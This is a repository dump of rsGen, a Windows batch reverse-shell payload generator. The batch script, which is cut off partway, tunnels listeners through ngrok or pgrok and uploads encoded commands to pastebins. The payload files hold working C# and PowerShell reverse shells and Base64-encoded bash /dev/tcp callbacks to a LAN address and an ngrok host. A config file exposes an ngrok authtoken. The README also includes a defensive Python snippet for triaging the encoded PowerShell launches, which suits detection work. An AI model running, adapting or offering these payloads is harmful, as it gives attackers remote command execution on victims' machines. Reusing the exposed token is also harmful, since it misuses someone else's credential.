├── .gitattributes
├── README.md
├── Screenshot
│   ├── donate-btc.png
│   ├── donate-doge.png
│   ├── donate-eth.png
│   ├── donate-xmr.png
│   ├── rsgen-ngrok.png
│   ├── rsgen-pgrok.png
│   └── rsgen.png
├── include
│   ├── curl-ca-bundle.crt
│   ├── curl.exe
│   ├── mongoose.exe
│   ├── ngrok.exe
│   ├── ngrok.yml
│   ├── pgrok.exe
│   ├── rs_ngrok.localation
│   ├── rs_ngrok.token
│   ├── rs_pastebin.api
│   ├── wincat.exe
│   └── www
│       ├── 404.html
│       ├── c
│       ├── i
│       └── index.html
├── payload
│   ├── c#.payload
│   ├── powershell_listener_1.payload
│   ├── powershell_listener_2.payload
│   └── rs_base64.payload
├── rsGen.bat
└── runcmd.bat


/.gitattributes:
--------------------------------------------------------------------------------
* linguist-vendored
*.bat linguist-language=Flyfish
# In general, use LF for text
* text eol=crlf

# Windows CMD does not like LF in batch files
*.bat text eol=crlf
*.cmd text eol=crlf

# Visual Studio solutions like to switch to CRLF at times
*.sln text eol=crlf

*.ai binary
*.aiff binary
*.dll binary
*.eot binary
*.exe binary
*.jar binary
*.jpg binary
*.gif binary
*.mp3 binary
*.o binary
*.pdf binary
*.png binary
*.psd binary
*.so binary
*.ttf binary
*.winmd binary
*.zip binary

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------

# This tool has been ported to Python. For cross-platform use, I reimplemented it in Python with multiple improvements: [rcX](https://github.com/FlyfishSec/rcX "rcX")
rsGen - Reverse Shell Payload Generator.
=

rsGen is a reverse shell payload generator for hacking, written as a Windows batch script. The main features include native command generation and variant command generation. In version 2.0, I added a TCP tunnel feature for receiving the shell ("-ngrok" and "-pgrok").

I will keep updating this tool. If you find any bugs or issues, please let me know via GitHub Issues and I will try my best to resolve them quickly.

![rsGen](https://raw.githubusercontent.com/FlyfishSec/rsGen/master/Screenshot/rsgen.png "rsGen")

## Usage


```

-pub      Generate a "variant command". With this parameter, the command is encoded and uploaded to a
          public pastebin website.

-lan      In some cases, the target machine cannot reach an external network. This parameter calls
          mongoose.exe in the command directory (a mini web server, only 144kb, see the website:
          https://cesanta.com/) to enable a web service on local port 80 for command request execution.
          When finished, you need to exit it manually.

-listen   Start listening on a local port to receive the shell that bounces back. Functionally
          equivalent to netcat (calls powercat.ps1).

-ngrok    Start an ngrok TCP tunnel (includes the -pub and -listen options).

-pgrok    Start a pgrok TCP tunnel (includes the -pub and -listen options). Like ngrok, but free and unlimited.

```
![rsGen](https://raw.githubusercontent.com/FlyfishSec/rsGen/master/Screenshot/rsgen-ngrok.png "rsGen-ngrok")


## Operating system

Windows 7 or a later version of Windows.
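
For defenders triaging process-creation logs: the Windows command this tool prints has the form `powershell -EP Bypass -NoLogo -NonI -NoP -Enc <Base64>`, and `rsGen.bat` builds the Base64 from the UTF-16LE bytes of the script. The Python triage below is an added example, not part of rsGen; its function names, marker lists, verdict labels and sample command lines are assumptions constructed for illustration.

```python
import base64
import re

# Launcher switches in the command shape rsGen prints (-EP Bypass -NonI -NoP).
# PowerShell accepts unambiguous prefixes, so the abbreviated forms are matched too.
LAUNCHER_MARKERS = {
    "policy_bypass": re.compile(r"(?:^|\s)-e(?:p|x\w*)\s+bypass\b", re.I),
    "no_profile": re.compile(r"(?:^|\s)-nop\w*", re.I),
    "non_interactive": re.compile(r"(?:^|\s)-noni\w*", re.I),
}
# Strings present in the PowerShell template files shown in this dump.
SCRIPT_MARKERS = {
    "tcp_client": re.compile(r"Net\.Sockets\.TCPClient", re.I),
    "raw_stream": re.compile(r"\.GetStream\(\)", re.I),
    "dynamic_eval": re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I),
}


def extract_encoded(cmdline):
    """Return the argument of -EncodedCommand (any accepted prefix), or None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if not tok.startswith(("-", "/")):
            continue
        name = tok[1:].lower()
        if name == "ec" or (name and "encodedcommand".startswith(name)):
            # The Windows 7 branch of rsGen.bat prints the payload in single quotes.
            return tokens[i + 1].strip("'\"")
    return None


def decode_encoded(b64):
    """Decode Base64 to UTF-16LE text; None if the payload is not valid."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None


def triage(cmdline):
    """Classify one process command line as ignore, review or alert."""
    hits = [n for n, rx in LAUNCHER_MARKERS.items() if rx.search(cmdline)]
    b64 = extract_encoded(cmdline)
    script = None
    if b64 is not None:
        script = decode_encoded(b64)
        if script is None:
            hits.append("undecodable_payload")
        else:
            hits += [n for n, rx in SCRIPT_MARKERS.items() if rx.search(script)]
    if "tcp_client" in hits and "dynamic_eval" in hits:
        verdict = "alert"    # socket plus evaluation of received text
    elif b64 is not None:
        verdict = "review"   # encoded command whose content needs a human look
    else:
        verdict = "ignore"
    return {"encoded": b64 is not None, "script": script, "hits": hits, "verdict": verdict}


def sample_cmd(prefix, script, quote=""):
    """Build a constructed log line from a script string (test fixture only)."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return f"{prefix} {quote}{b64}{quote}"


# Constructed samples, not captured from any real host. FRAGMENT is a
# non-functional excerpt that only carries the marker strings.
FRAGMENT = "$ct=New-Object System.Net.Sockets.TCPClient('host.example',4444);$st=$ct.GetStream();iex $data"
LAUNCHER = "powershell -EP Bypass -NoLogo -NonI -NoP -Enc"
SAMPLES = {
    "socket_eval": sample_cmd(LAUNCHER, FRAGMENT),
    "socket_eval_quoted": sample_cmd(LAUNCHER, FRAGMENT, "'"),
    "admin_task": sample_cmd("powershell -NoProfile -EncodedCommand", "Get-Date"),
    "malformed": "powershell -Enc !!!notbase64",
    "plain_file": "powershell -NoP -File backup.ps1",
}

if __name__ == "__main__":
    for name, line in SAMPLES.items():
        r = triage(line)
        print(f"{name:20} {r['verdict']:7} {','.join(r['hits'])}")
```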

## Donations

Bitcoin Address QR Code | Ethereum Address QR Code | Monero Address QR Code | DOGECOIN Address QR Code
:-------------------------:|:-------------------------:|:-------------------------:|:-------------------------:
 | | | 

**BTC**: 3F2R6KMXbJ576yJNJpjrBnhVG64Ltg1WoF

**ETH**: 0xab15323b0c7721B6B9fDf5A8089a6Ec697C9feED

**XMR**: 48rBRHh2iV27oHzXMGnjbwCLLyinpqFry6gLTAaQiFVtMRw4kqabeoFiBYqNAPCBHbKjgQezPNLwDihMSNbEPCuYP1xzCWi

**Dogecoin**: DBQATuB7t4wk56dwFqcGdqQtY8BSjL77if


--------------------------------------------------------------------------------
/Screenshot/donate-btc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/FlyfishSec/rsGen/e91ff18035726d2330d5b264986d742f4a2b53eb/Screenshot/donate-btc.png

--------------------------------------------------------------------------------
/Screenshot/donate-doge.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/FlyfishSec/rsGen/e91ff18035726d2330d5b264986d742f4a2b53eb/Screenshot/donate-doge.png

--------------------------------------------------------------------------------
/Screenshot/donate-eth.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/FlyfishSec/rsGen/e91ff18035726d2330d5b264986d742f4a2b53eb/Screenshot/donate-eth.png

--------------------------------------------------------------------------------
/Screenshot/donate-xmr.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/FlyfishSec/rsGen/e91ff18035726d2330d5b264986d742f4a2b53eb/Screenshot/donate-xmr.png

--------------------------------------------------------------------------------
/Screenshot/rsgen-ngrok.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/FlyfishSec/rsGen/e91ff18035726d2330d5b264986d742f4a2b53eb/Screenshot/rsgen-ngrok.png

--------------------------------------------------------------------------------
/Screenshot/rsgen-pgrok.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/FlyfishSec/rsGen/e91ff18035726d2330d5b264986d742f4a2b53eb/Screenshot/rsgen-pgrok.png

--------------------------------------------------------------------------------
/Screenshot/rsgen.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/FlyfishSec/rsGen/e91ff18035726d2330d5b264986d742f4a2b53eb/Screenshot/rsgen.png

--------------------------------------------------------------------------------
/include/curl.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/FlyfishSec/rsGen/e91ff18035726d2330d5b264986d742f4a2b53eb/include/curl.exe

--------------------------------------------------------------------------------
/include/mongoose.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/FlyfishSec/rsGen/e91ff18035726d2330d5b264986d742f4a2b53eb/include/mongoose.exe

--------------------------------------------------------------------------------
/include/ngrok.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/FlyfishSec/rsGen/e91ff18035726d2330d5b264986d742f4a2b53eb/include/ngrok.exe

--------------------------------------------------------------------------------
/include/ngrok.yml:
--------------------------------------------------------------------------------
authtoken: 1gYNGCw1ZRgzRTMckejZJ68fbOe_3dFZJfLuA8tTseLCmjYWK
web_addr: 44480
region: eu

--------------------------------------------------------------------------------
/include/pgrok.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/FlyfishSec/rsGen/e91ff18035726d2330d5b264986d742f4a2b53eb/include/pgrok.exe

--------------------------------------------------------------------------------
/include/rs_ngrok.localation:
--------------------------------------------------------------------------------
us
eu
ap
au
sa
jp
in

--------------------------------------------------------------------------------
/include/rs_ngrok.token:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/include/rs_pastebin.api:
--------------------------------------------------------------------------------
https://p.ip.fi/
https://dpaste.com/api/v2/
https://ghostbin.co/paste/new
https://paste.teknik.io/Action/Paste

--------------------------------------------------------------------------------
/include/wincat.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/FlyfishSec/rsGen/e91ff18035726d2330d5b264986d742f4a2b53eb/include/wincat.exe

--------------------------------------------------------------------------------
/include/www/404.html:
--------------------------------------------------------------------------------
Can't reach this page

Details

This site can't be found.

Error code: INET_E_RESOURCE_NOT_FOUND

165 | 166 | 167 | -------------------------------------------------------------------------------- /include/www/c: -------------------------------------------------------------------------------- 1 | /*&cls&@echo off&set "$=%systemroot%\Microsoft.NET\Framework"&for /f "delims=" %%i in ('dir /ad /b "%$%\v?.*"') do (if exist "%$%\%%i\csc.exe" (set "$$=%$%\%%i\csc.exe" del /q %tmp%\$.exe&"%$$%" /nologo /out:"%tmp%\$.exe" "%~f0"&&%tmp%\$.exe %1 %2 %3&exit /b 0))&*/using System;using System.IO;using System.Net;using System.Net.Sockets;using System.Text;using System.Diagnostics;public class cs{public static TcpClient tcpClient; public static NetworkStream stream; public static StreamReader streamReader; public static StreamWriter streamWriter; public static StringBuilder UserInput; public static void Main(string[] args){tcpClient=new TcpClient();UserInput=new StringBuilder();if (!tcpClient.Connected){try{tcpClient.Connect(args[0].ToString(),Convert.ToInt32(args[1]));stream=tcpClient.GetStream();streamReader=new StreamReader(stream,System.Text.Encoding.Default);streamWriter=new StreamWriter(stream,System.Text.Encoding.Default);}catch (Exception){return;}Process CmdProc;CmdProc=new Process();CmdProc.StartInfo.FileName=args[2].ToString();CmdProc.StartInfo.UseShellExecute=false;CmdProc.StartInfo.RedirectStandardInput=true;CmdProc.StartInfo.RedirectStandardOutput=true;CmdProc.StartInfo.RedirectStandardError=true;CmdProc.OutputDataReceived += new DataReceivedEventHandler(SortOutputHandler);CmdProc.ErrorDataReceived += new DataReceivedEventHandler(SortOutputHandler);CmdProc.Start();CmdProc.BeginOutputReadLine();CmdProc.BeginErrorReadLine();while (true){try{UserInput.Append(streamReader.ReadLine());CmdProc.StandardInput.WriteLine(UserInput);UserInput.Remove(0,UserInput.Length);}catch (Exception){streamReader.Close();streamWriter.Close();CmdProc.Kill();break;}}}}public static void SortOutputHandler(object sendingProcess,DataReceivedEventArgs outLine){StringBuilder strOutput=new 
StringBuilder();if (!String.IsNullOrEmpty(outLine.Data)){try{strOutput.Append(outLine.Data);streamWriter.WriteLine(strOutput);streamWriter.Flush();}catch (Exception){}}}}/*>nul 2>nul&*/

--------------------------------------------------------------------------------
/include/www/i:
--------------------------------------------------------------------------------
L2Jpbi9iYXNoIC1pPiYvZGV2L3RjcC8xOTIuMTY4LjExLjEvODg4OCAwPiYx&powershell -EP Bypass -NoLogo -NonI -NoP -Enc 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

--------------------------------------------------------------------------------
/include/www/index.html:
--------------------------------------------------------------------------------
Can't reach this page

Details

This site can't be found.

Error code: INET_E_RESOURCE_NOT_FOUND

165 | 166 | 167 | -------------------------------------------------------------------------------- /payload/c#.payload: -------------------------------------------------------------------------------- 1 | /*&cls&@echo off&set "$=%systemroot%\Microsoft.NET\Framework"&for /f "delims=" %%i in ('dir /ad /b "%$%\v?.*"') do (if exist "%$%\%%i\csc.exe" (set "$$=%$%\%%i\csc.exe" del /q %tmp%\$.exe&"%$$%" /nologo /out:"%tmp%\$.exe" "%~f0"&&%tmp%\$.exe %1 %2 %3&exit /b 0))&*/using System;using System.IO;using System.Net;using System.Net.Sockets;using System.Text;using System.Diagnostics;public class cs{public static TcpClient tcpClient; public static NetworkStream stream; public static StreamReader streamReader; public static StreamWriter streamWriter; public static StringBuilder UserInput; public static void Main(string[] args){tcpClient=new TcpClient();UserInput=new StringBuilder();if (!tcpClient.Connected){try{tcpClient.Connect(args[0].ToString(),Convert.ToInt32(args[1]));stream=tcpClient.GetStream();streamReader=new StreamReader(stream,System.Text.Encoding.Default);streamWriter=new StreamWriter(stream,System.Text.Encoding.Default);}catch (Exception){return;}Process CmdProc;CmdProc=new Process();CmdProc.StartInfo.FileName=args[2].ToString();CmdProc.StartInfo.UseShellExecute=false;CmdProc.StartInfo.RedirectStandardInput=true;CmdProc.StartInfo.RedirectStandardOutput=true;CmdProc.StartInfo.RedirectStandardError=true;CmdProc.OutputDataReceived += new DataReceivedEventHandler(SortOutputHandler);CmdProc.ErrorDataReceived += new DataReceivedEventHandler(SortOutputHandler);CmdProc.Start();CmdProc.BeginOutputReadLine();CmdProc.BeginErrorReadLine();while (true){try{UserInput.Append(streamReader.ReadLine());CmdProc.StandardInput.WriteLine(UserInput);UserInput.Remove(0,UserInput.Length);}catch (Exception){streamReader.Close();streamWriter.Close();CmdProc.Kill();break;}}}}public static void SortOutputHandler(object sendingProcess,DataReceivedEventArgs outLine){StringBuilder 
strOutput=new StringBuilder();if (!String.IsNullOrEmpty(outLine.Data)){try{strOutput.Append(outLine.Data);streamWriter.WriteLine(strOutput);streamWriter.Flush();}catch (Exception){}}}}/*>nul 2>nul&*/ -------------------------------------------------------------------------------- /payload/powershell_listener_1.payload: -------------------------------------------------------------------------------- 1 | $ct=New-Object System.Net.Sockets.TCPClient('' -------------------------------------------------------------------------------- /payload/powershell_listener_2.payload: -------------------------------------------------------------------------------- 1 | );$st=$ct.GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$st.Read($bt, 0, $bt.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bt,0, $i);$sb=(iex $data 2>&1|Out-String );$sb2 =$sb+(pwd).Path+''>'';$sd=([text.encoding]::ASCII).GetBytes($sb2);$st.Write($sd,0,$sd.Length);$st.Flush()};$ct.Close() -------------------------------------------------------------------------------- /payload/rs_base64.payload: -------------------------------------------------------------------------------- 1 | L2Jpbi9iYXNoIC1pPiYvZGV2L3RjcC8wLnRjcC5qcC5uZ3Jvay5pby8xNDQ2NCAwPiYx&powershell -EP Bypass -NoLogo -NonI -NoP -Enc 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 2 | -------------------------------------------------------------------------------- /rsGen.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | title rsGen - Reverse Shell Payload Generator 3 | 4 | ::main 5 | :rs_main_start 6 | setlocal enableDelayedExpansion 7 | call :rs_os_detect_start 8 | if "%~1" equ "" ( 9 | if "!rs_os_flag!"=="W10" ( 10 | call :rs_banner_w10_start 11 | ) else ( 12 | call :rs_banner_w7_start 13 | ) 14 | goto rs_help_start 15 | ) else ( 16 | set rs_listen_host=%~1 17 | 18 | if "%~2" equ "" ( 19 | if "!rs_os_flag!"=="W10" ( 20 | call :rs_banner_w10_start 21 | echo,&echo 
-Missing port argument 22 | ) else ( 23 | call :rs_banner_w7_start 24 | echo, 25 | powershell -c write-host "' - Missing port argument'" -f red -n 2>nul 26 | ) 27 | goto rs_help_start 28 | ) else ( 29 | set rs_listen_port=%~2 30 | 31 | if /i "%2"=="-ngrok" ( 32 | set rs_ngrok= 33 | set rs_listen_port=%~1 34 | 35 | if "!rs_os_flag!"=="W10" ( 36 | call :rs_banner_w10_start 37 | ) else ( 38 | call :rs_banner_w7_start 39 | ) 40 | 41 | call :rs_local_listen_start %~1 42 | call :rs_ngrok_start 43 | 44 | if !rs_ngrok! == 0 ( 45 | call :rs_command_generate_pub_start !rs_ngrok_host! !rs_ngrok_port! 46 | ) else ( 47 | powershell -c write-host "' - Get ngrok tunnel url timeout,Please make sure you are connected to the internet and try again.'" -f red -n 2>nul 48 | echo, 49 | goto :eof 50 | ) 51 | 52 | if "!rs_os_flag!"=="W10" ( 53 | call :rs_info_w10windows_start 54 | call :rs_windows_command_raw_start !rs_ngrok_host! !rs_ngrok_port! 55 | call :rs_command_generate_pub_output_windowsw10_start 56 | call :rs_info_w10linux_start 57 | call :rs_linux_command_raw_start !rs_ngrok_host! !rs_ngrok_port! 58 | call :rs_command_generate_pub_output_linuxw10_start 59 | call :rs_info_wlinux10_start 60 | call :rs_command_generate_pub_output_wl10_start 61 | goto :eof 62 | ) else ( 63 | call :rs_info_w7windows_start 64 | call :rs_windows_command_raw_start !rs_ngrok_host! !rs_ngrok_port! 65 | call :rs_command_generate_pub_output_windowsw7_start 66 | call :rs_info_w7linux_start 67 | call :rs_linux_command_raw_start !rs_ngrok_host! !rs_ngrok_port! 
68 | call :rs_command_generate_pub_output_linuxw7_start 69 | call :rs_info_wlinux7_start 70 | call :rs_command_generate_pub_output_wl7_start 71 | goto :eof 72 | ) 73 | 74 | ) 75 | 76 | if /i "%2"=="-pgrok" ( 77 | set rs_pgrok= 78 | set rs_listen_port=%~1 79 | 80 | if "!rs_os_flag!"=="W10" ( 81 | call :rs_banner_w10_start 82 | ) else ( 83 | call :rs_banner_w7_start 84 | ) 85 | 86 | call :rs_local_listen_start %~1 87 | call :rs_pgrok_start 88 | 89 | if !rs_pgrok! == 0 ( 90 | call :rs_command_generate_pub_start !rs_pgrok_host! !rs_pgrok_port! 91 | ) else ( 92 | powershell -c write-host "' - Get pgrok tunnel url timeout.'" -f red -n 2>nul 93 | echo, 94 | goto :eof 95 | ) 96 | 97 | if "!rs_os_flag!"=="W10" ( 98 | call :rs_info_w10windows_start 99 | call :rs_windows_command_raw_start !rs_pgrok_host! !rs_pgrok_port! 100 | call :rs_command_generate_pub_output_windowsw10_start 101 | call :rs_info_w10linux_start 102 | call :rs_linux_command_raw_start !rs_pgrok_host! !rs_pgrok_port! 103 | call :rs_command_generate_pub_output_linuxw10_start 104 | call :rs_info_wlinux10_start 105 | call :rs_command_generate_pub_output_wl10_start 106 | goto :eof 107 | ) else ( 108 | call :rs_info_w7windows_start 109 | call :rs_windows_command_raw_start !rs_pgrok_host! !rs_pgrok_port! 110 | call :rs_command_generate_pub_output_windowsw7_start 111 | call :rs_info_w7linux_start 112 | call :rs_linux_command_raw_start !rs_pgrok_host! !rs_pgrok_port! 113 | call :rs_command_generate_pub_output_linuxw7_start 114 | call :rs_info_wlinux7_start 115 | call :rs_command_generate_pub_output_wl7_start 116 | goto :eof 117 | ) 118 | 119 | ) 120 | 121 | call :rs_check_port_start !rs_listen_port! 
122 | if "!rs_value_type!"=="1" ( 123 | if "!rs_os_flag!"=="W10" ( 124 | call :rs_banner_w10_start 125 | echo,&echo -Wrong port argument 126 | ) else ( 127 | call :rs_banner_w7_start 128 | echo, 129 | powershell -c write-host "' - Wrong port argument'" -f red -n 2>nul 130 | ) 131 | goto rs_help_start 132 | ) else ( 133 | set rs_webport=80 134 | 135 | if not "%3"=="" ( 136 | for %%i in (%3 %4 %5 %6 %7 %8) do ( 137 | if /i "%%i"=="-pub" ( 138 | if "!rs_os_flag!"=="W10" ( 139 | call :rs_banner_w10_start 140 | echo + Host:Port ^<==^> %~1:%~2 141 | call :rs_command_generate_pub_start %~1 %~2 142 | call :rs_info_w10windows_start 143 | call :rs_command_generate_pub_output_windowsw10_start 144 | call :rs_info_w10linux_start 145 | call :rs_command_generate_pub_output_linuxw10_start 146 | call :rs_info_wlinux10_start 147 | call :rs_command_generate_pub_output_wl10_start 148 | ) else ( 149 | call :rs_banner_w7_start 150 | echo + Host:Port ^<==^> %~1:%~2 151 | call :rs_command_generate_pub_start %~1 %~2 152 | call :rs_info_w7windows_start 153 | call :rs_command_generate_pub_output_windowsw7_start 154 | call :rs_info_w7linux_start 155 | call :rs_command_generate_pub_output_linuxw7_start 156 | call :rs_info_wlinux7_start 157 | call :rs_command_generate_pub_output_wl7_start 158 | ) 159 | ) 160 | if /i "%%i"=="-lan" ( 161 | if "!rs_os_flag!"=="W10" ( 162 | call :rs_banner_w10_start 163 | ) else ( 164 | call :rs_banner_w7_start 165 | ) 166 | call :rs_command_lan_start %~1 %~2 167 | ) 168 | if /i "%%i"=="-listen" ( 169 | call :rs_local_listen_start %~2 170 | ) 171 | 172 | if /i "%%i"=="-ngrok" ( 173 | if "!rs_os_flag!"=="W10" ( 174 | call :rs_banner_w10_start 175 | ) else ( 176 | call :rs_banner_w7_start 177 | ) 178 | echo Please try "%~nx0 -ngrok" 179 | goto rs_help_start 180 | ) 181 | 182 | if /i "%%i"=="-pgrok" ( 183 | if "!rs_os_flag!"=="W10" ( 184 | call :rs_banner_w10_start 185 | ) else ( 186 | call :rs_banner_w7_start 187 | ) 188 | echo Please try "%~nx0 -pgrok" 189 | goto 
rs_help_start 190 | ) 191 | ) 192 | 193 | ) else ( 194 | if not "%2"=="-ngrok" ( 195 | if not "%2"=="-pgrok" ( 196 | if "!rs_os_flag!"=="W10" ( 197 | call :rs_banner_w10_start 198 | echo + Host:Port ^<==^> %~1:%~2 199 | call :rs_info_w10windows_start 200 | call :rs_windows_command_raw_start %~1 %~2 201 | call :rs_info_w10linux_start 202 | call :rs_linux_command_raw_start %~1 %~2 203 | ) else ( 204 | call :rs_banner_w7_start 205 | echo + Host:Port ^<==^> %~1:%~2 206 | call :rs_info_w7windows_start 207 | call :rs_windows_command_raw_start %~1 %~2 208 | call :rs_info_w7linux_start 209 | call :rs_linux_command_raw_start %~1 %~2 210 | ) 211 | ) 212 | ) 213 | ) 214 | 215 | call :rs_clean_tempfile_start 216 | ) 217 | ) 218 | ) 219 | endlocal 220 | goto :eof 221 | :rs_main_end 222 | 223 | ::Detect system version using ANSI color 224 | :rs_os_detect_start 225 | for /f "tokens=4-7 delims=[]. " %%i in ('ver') do ( 226 | set /a_majorminor=%%i * 100 + %%j 227 | set /a_build=%%k0 /10 228 | set /a_revision=%%l0 /10 229 | ) 230 | set "rs_os_flag=" 231 | if %_majorminor% geq 1000 ( 232 | if %_build% gtr 10586 ( 233 | set rs_os_flag=W10 234 | ) 235 | ) else ( 236 | set rs_os_flag=-1 237 | if %_build% equ 10586 ( 238 | if %_revision% geq 11 ( 239 | set rs_os_flag=W10 240 | ) 241 | ) 242 | ) 243 | :rs_os_detect_end 244 | 245 | ::Check port format 246 | :rs_check_port_start 247 | set rs_value= 248 | set rs_value=%1 249 | echo %rs_value%|findstr "^[0-9]*$">nul 250 | if %errorlevel% equ 0 ( 251 | set rs_value_type=0 252 | ) else ( 253 | set rs_value_type=1 254 | ) 255 | goto :eof 256 | :rs_check_prot_end 257 | 258 | ::Find available ports 259 | :rs_set_webport_start 260 | netstat -o -n -a | find /i "LISTENING" | find ":%rs_webport% " > NUL 261 | if "%ERRORLEVEL%" equ "0" ( 262 | set /a rs_webport +=1 263 | goto rs_set_webport_start 264 | ) else ( 265 | set rs_webport=%rs_webport% 266 | ) 267 | goto :eof 268 | :rs_set_webport_end 269 | 270 | ::base64 encode 271 | :rs_base64_encode_start 
272 | set /p"%temp%\rs_temp_input.rsg" 273 | certutil -encodehex -f "%temp%\rs_temp_input.rsg" "%temp%\rs_temp_output.rsg" 0x40000001 >nul 2>nul 274 | FOR /F "delims==" %%i in (%temp%\rs_temp_output.rsg) do (set rsgen_b64_res=%%i) 275 | rem echo "!rsgen_b64_res!" 276 | :rs_base64_encode_end 277 | 278 | ::Clean temporary files 279 | :rs_clean_tempfile_start 280 | if exist "%temp%\rs_temp_input.rsg" del /q %temp%\rs_temp_input.rsg 281 | if exist "%temp%\rs_temp_output.rsg" del /q %temp%\rs_temp_output.rsg 282 | if exist "%temp%\powershell_listener.tmp" del /q %temp%\powershell_listener.tmp 283 | goto :eof 284 | :rs_clean_tempfile_end 285 | 286 | ::Listen to the local port 287 | :rs_local_listen_start 288 | set rs_listen_port=%1 289 | if exist "%cd%\include\wincat.exe" ( 290 | echo + Listening on port 0.0.0.0:!rs_listen_port! 291 | start "Listening port !rs_listen_port!" %cd%\include\wincat.exe -l 0.0.0.0 !rs_listen_port!" 2>nul 292 | ) else ( 293 | powershell -c write-host "' - Unable to start listening,Missing file %cd%\include\wincat.exe'" -f red -n 2>nul 294 | goto :rs_help_start 295 | ) 296 | goto :eof 297 | :rs_local_listen_end 298 | 299 | ::Convert Domain to IP 300 | :rs_domain2IP_start 301 | set rs_domain2ip=%1 302 | for /f "tokens=2" %%i in ('nslookup %1 8.8.8.8 2^>NUL^|findstr /i /V "dns 8.8.8 ngrok"') do ( 303 | set rs_domain2ip=%%i 304 | ) 305 | goto :eof 306 | :rs_domain2IP_end 307 | 308 | ::rs_ngrok 309 | :rs_ngrok_start 310 | echo i Starting ngrok and get the forwarding address,please wait... 311 | if exist "%cd%\include\ngrok.exe" ( 312 | call :rs_random_token_start %cd%\include\rs_ngrok.token 313 | call :rs_random_location_start %cd%\include\rs_ngrok.localation 314 | echo authtoken: !rs_random_token! >%cd%\include\ngrok.yml 315 | echo web_addr: 44480 >>%cd%\include\ngrok.yml 316 | echo region: !rs_random_location! >>%cd%\include\ngrok.yml 317 | start "Expose a TCP based service running on port !rs_listen_port!" 
cmd /c %cd%\include\ngrok.exe tcp !rs_listen_port! -config=%cd%\include\ngrok.yml 2>nul 318 | set rs_ngrok= 319 | set rs_n=0 320 | FOR /L %%i in (1,1,20) do ( 321 | set /a rs_n=!rs_n!+1 322 | %cd%\include\curl.exe -s --retry 3 --retry-delay 5 --retry-connrefused http://localhost:44480/api/tunnels|find /i "ngrok.io" >nul&&set rs_ngrok=0 323 | if !rs_ngrok! == 0 goto :rs_ngrok_host 324 | ) 325 | 326 | :rs_ngrok_host 327 | if !rs_ngrok! == 0 ( 328 | FOR /F "tokens=9 delims==://" %%i in ('%cd%\include\curl.exe -s --retry 3 --retry-delay 5 --retry-connrefused http://localhost:44480/api/tunnels') do (set rs_ngrok_host=%%i) 329 | FOR /F tokens^=11^ delims^=^:^,^" %%i in ('%cd%\include\curl.exe -s --retry 3 --retry-delay 5 --retry-connrefused http://localhost:44480/api/tunnels') do (set rs_ngrok_port=%%i) 330 | 331 | set rs_listen_host=!rs_ngrok_host! 332 | echo + Ngrok tcp tunnel 127.0.0.1:!rs_listen_port! ^<==^> !rs_ngrok_host!:!rs_ngrok_port! 333 | rem echo !rs_ngrok_host! 334 | rem echo !rs_ngrok_port! 335 | rem echo !rs_n! time... 336 | call :rs_domain2IP_start !rs_ngrok_host! 337 | 338 | if not "!rs_domain2ip!" == "" ( 339 | set rs_ngrok_host=!rs_domain2ip! 340 | echo 127.0.0.1:!rs_listen_port! ^<==^> !rs_domain2ip!:!rs_ngrok_port! 341 | ) else ( 342 | echo - Attempt to convert Ngrok domain name to IP failed. 343 | ) 344 | ) 345 | goto :eof 346 | 347 | ) else ( 348 | echo, 349 | powershell -c write-host "' - Unable to start Service,Missing file %cd%\include\ngrok.exe.'" -f red -n 2>nul 350 | goto :rs_help_start 351 | ) 352 | goto :eof 353 | :rs_ngrok_end 354 | 355 | ::Read random token from text 356 | :rs_random_token_start 357 | set i=0 358 | for /f "tokens=*" %%x in (%1) do ( 359 | set line[!i!]=%%x 360 | set /a i += 1 361 | ) 362 | set /a j=%random% %% %i% 363 | set rs_random_token=!line[%j%]! 364 | ::echo !rs_random_token! 
365 | goto :eof 366 | :rs_random_token_end 367 | 368 | :rs_random_location_start 369 | set i=0 370 | for /f "tokens=*" %%x in (%1) do ( 371 | set line[!i!]=%%x 372 | set /a i += 1 373 | ) 374 | set /a j=%random% %% %i% 375 | set rs_random_location=!line[%j%]! 376 | ::echo !rs_random_location! 377 | goto :eof 378 | :rs_random_location_end 379 | 380 | :rs_pastebin_api_start 381 | set i=0 382 | for /f "tokens=*" %%x in (%1) do ( 383 | set line[!i!]=%%x 384 | set /a i += 1 385 | ) 386 | set /a j=%random% %% %i% 387 | set rs_pastebin_api=!line[%j%]! 388 | ::echo !rs_pastebin_api! 389 | goto :eof 390 | :rs_pastebin_api_end 391 | 392 | ::rs_pgrok 393 | :rs_pgrok_start 394 | echo i Starting Pgrok and get the forwarding address,please wait... 395 | if exist "%cd%\include\pgrok.exe" ( 396 | start "Expose a TCP based service running on port !rs_listen_port!" cmd /c %cd%\include\pgrok.exe -proto=tcp !rs_listen_port! 2>nul 397 | 398 | set rs_pgrok= 399 | set rs_n=0 400 | FOR /L %%i in (1,1,30) do ( 401 | set /a rs_n=!rs_n!+1 402 | %cd%\include\curl.exe -s --retry 3 --retry-delay 5 --retry-connrefused http://localhost:4040/http/in|find /i "ejemplo.me" >nul&&set rs_pgrok=0 403 | if !rs_pgrok! == 0 goto :rs_pgrok_host 404 | ) 405 | 406 | :rs_pgrok_host 407 | if !rs_pgrok! == 0 ( 408 | FOR /F tokens^=11^ delims^=^/^\^:^,^" %%i in ('%cd%\include\curl.exe -s --retry 3 --retry-delay 5 